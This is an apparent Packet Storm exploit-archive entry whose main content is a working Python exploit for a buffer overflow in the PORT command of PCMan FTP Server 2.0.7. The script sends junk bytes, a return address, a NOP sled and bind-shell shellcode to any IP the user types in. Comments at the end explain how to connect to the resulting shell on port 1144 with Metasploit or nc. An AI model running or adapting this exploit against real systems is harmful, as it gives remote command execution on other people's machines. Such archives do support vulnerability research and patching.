PCMan FTP Server 2.0.7 PORT Buffer Overflow

2016-11-04T00:00:00
ID PACKETSTORM:139569
Type packetstorm
Reporter Pablo Gonzalez
Modified 2016-11-04T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
#-*- coding: utf-8 -*-  
  
# Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit  
# Author: Pablo GonzA!lez  
# Date: 4/11/2016  
# Software: PCMan 2.0  
# Tested on: Windows XP Profesional SP3 Spanish x86  
  
import socket  
  
print "Creating malicious input!"  
  
junk = '\x41'*2007  
ret="\xf7\x56\x3c\x7e" #User32.dll 7E3C56F7  
nops = '\x90'*20  
  
#msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c  
#put shellcode in variable 'sc'  
  
sc=("\xdb\xd6\xba\xd3\x95\x1b\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"  
"\x53\x31\x50\x17\x83\xe8\xfc\x03\x83\x86\xf9\x25\xdf\x41\x7f"  
"\xc5\x1f\x92\xe0\x4f\xfa\xa3\x20\x2b\x8f\x94\x90\x3f\xdd\x18"  
"\x5a\x6d\xf5\xab\x2e\xba\xfa\x1c\x84\x9c\x35\x9c\xb5\xdd\x54"  
"\x1e\xc4\x31\xb6\x1f\x07\x44\xb7\x58\x7a\xa5\xe5\x31\xf0\x18"  
"\x19\x35\x4c\xa1\x92\x05\x40\xa1\x47\xdd\x63\x80\xd6\x55\x3a"  
"\x02\xd9\xba\x36\x0b\xc1\xdf\x73\xc5\x7a\x2b\x0f\xd4\xaa\x65"  
"\xf0\x7b\x93\x49\x03\x85\xd4\x6e\xfc\xf0\x2c\x8d\x81\x02\xeb"  
"\xef\x5d\x86\xef\x48\x15\x30\xcb\x69\xfa\xa7\x98\x66\xb7\xac"  
"\xc6\x6a\x46\x60\x7d\x96\xc3\x87\x51\x1e\x97\xa3\x75\x7a\x43"  
"\xcd\x2c\x26\x22\xf2\x2e\x89\x9b\x56\x25\x24\xcf\xea\x64\x21"  
"\x3c\xc7\x96\xb1\x2a\x50\xe5\x83\xf5\xca\x61\xa8\x7e\xd5\x76"  
"\xcf\x54\xa1\xe8\x2e\x57\xd2\x21\xf5\x03\x82\x59\xdc\x2b\x49"  
"\x99\xe1\xf9\xe4\x91\x44\x52\x1b\x5c\x36\x02\x9b\xce\xdf\x48"  
"\x14\x31\xff\x72\xfe\x5a\x68\x8f\x01\x60\x11\x06\xe7\x02\xf1"  
"\x4e\xbf\xba\x33\xb5\x08\x5d\x4b\x9f\x20\xc9\x04\xc9\xf7\xf6"  
"\x94\xdf\x5f\x60\x1f\x0c\x64\x91\x20\x19\xcc\xc6\xb7\xd7\x9d"  
"\xa5\x26\xe7\xb7\x5d\xca\x7a\x5c\x9d\x85\x66\xcb\xca\xc2\x59"  
"\x02\x9e\xfe\xc0\xbc\xbc\x02\x94\x87\x04\xd9\x65\x09\x85\xac"  
"\xd2\x2d\x95\x68\xda\x69\xc1\x24\x8d\x27\xbf\x82\x67\x86\x69"  
"\x5d\xdb\x40\xfd\x18\x17\x53\x7b\x25\x72\x25\x63\x94\x2b\x70"  
"\x9c\x19\xbc\x74\xe5\x47\x5c\x7a\x3c\xcc\x6c\x31\x1c\x65\xe5"  
"\x9c\xf5\x37\x68\x1f\x20\x7b\x95\x9c\xc0\x04\x62\xbc\xa1\x01"  
"\x2e\x7a\x5a\x78\x3f\xef\x5c\x2f\x40\x3a")  
  
buffer= junk + ret + nops + sc  
  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
ip = raw_input('Give me Remote IP Address:')  
connect=s.connect((ip,21))  
banner = s.recv(1024)  
print banner  
s.send('USER anonymous\r\n')  
s.recv(1024)  
s.send('PASS\r\n')  
s.recv(1024)  
#Sending input PORT command (Exploitation is coming)  
s.send('PORT' + buffer + '\r\n')  
s.close()  
  
#Metasploit exploit/multi/handler or nc <ip> <port> :D  
#  
# For exploit/multi/handler  
#  
# use exploit/multi/handler  
# set PAYLOAD windows/shell_bind_tcp  
# set RHOST <ip>  
# set LPORT 1144  
# exploit  
# ...  
# Got it!  
  
print "Got it? :D"  
  
`